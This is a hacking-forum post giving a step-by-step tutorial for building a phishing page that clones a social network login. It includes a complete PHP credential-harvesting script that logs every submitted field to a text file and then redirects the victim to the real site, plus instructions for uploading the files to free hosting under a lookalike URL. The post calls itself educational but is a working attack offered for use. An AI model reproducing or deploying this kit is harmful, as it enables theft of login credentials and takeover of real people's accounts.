Sign in to follow this  
mesvak

How to create Scam page [phishing page] for almost any social networking (REQUESTED)

Recommended Posts

[hide]

➖➖➖➖➖➖➖➖➖➖➖➖
For this trick you would need a hosting account, you can get that quickly.
Register yourself at t35, host1free, 110mb etc.
Note- 110mb checks for phishing page on their site and removes them.
So now u have a hosting account, so let's create a fake page-
First, go to the target site. In your browser select Save As from the File menu and save the website on your hard disk with name "login.htm".
Or right click on the page and click "view source" and copy all of it and save them to a notepad file. Rename the file with "login.htm".
Now the second part of the hack-
Go to Notepad and copy this into it-

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value)
{
  fwrite($handle, $variable);
  fwrite($handle, "=");
  fwrite($handle, $value);
  fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Replace facebook.com with the URL you want the user to go after he clicks on submit button.
Save the page as fish.php
Now you need to edit the "login.htm" file we save earlier. So go to that and open it with notepad.
Now search for any htm like "action=" which has something with login. And replace the URL with "fish.php".
Also, create a blank text file with the name "log.txt". This file would be used to save your logins and passwords.
Now you are done,
Go to your hosting account and upload all the files to your server.
Now go to the URL provided by your host.
Like - http://g00glepage.t35.com/login.htm
And you would see the fake page as it is.
Now enter the username and password.
Check the log.txt file. 
The password and username you entered previously would be saved in the log.txt file including other details such as time stamp.
Here you have a working phishing page.

Note:- For this trick require website on which you have to put three file fish.php,login.html,log.txt (where your password will be store). This tutorial is for educational purpose only.

 

 

 

[/hide]

Share this post


Link to post
Share on other sites

bad very bad

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this